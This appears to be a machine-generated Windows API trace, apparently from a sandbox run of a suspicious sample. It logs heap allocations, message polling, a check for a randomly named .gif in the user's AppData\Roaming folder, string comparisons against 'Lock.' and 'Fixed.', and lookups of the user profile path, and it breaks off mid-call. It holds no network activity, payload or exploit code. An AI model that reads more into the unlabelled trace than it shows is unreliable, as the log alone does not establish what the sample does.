RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f6c0 [0122.368] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DZjNZY.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\DZjNZY.gif", lpFilePart=0x8cf650*="DZjNZY.gif") returned 0x2a [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0122.368] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DZjNZY.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dzjnzy.gif")) returned 0xffffffff [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.368] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0122.368] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.368] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0122.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F74jGmHWDSdyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="74jGmHWDSdyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4jGmHWDSdyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jGmHWDSdyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GmHWDSdyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHWDSdyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HWDSdyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WDSdyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DSdyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SdyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dyxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yxplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xplK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lK8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zu.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0122.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0122.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0122.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0122.369] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0122.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.369] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.370] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0122.370] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F74jGmHWDSdyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="74jGmHWDSdyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4jGmHWDSdyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jGmHWDSdyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GmHWDSdyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHWDSdyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HWDSdyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WDSdyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DSdyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SdyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dyxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yxplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xplK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lK8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0122.371] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zu.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0122.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6728 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.371] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0122.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0122.371] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0122.371] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0122.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.371] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0122.372] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0122.372] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0122.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0122.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0122.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0122.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0122.373] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0122.374] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0122.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0122.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0122.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0122.375] RtlAllocateHeap 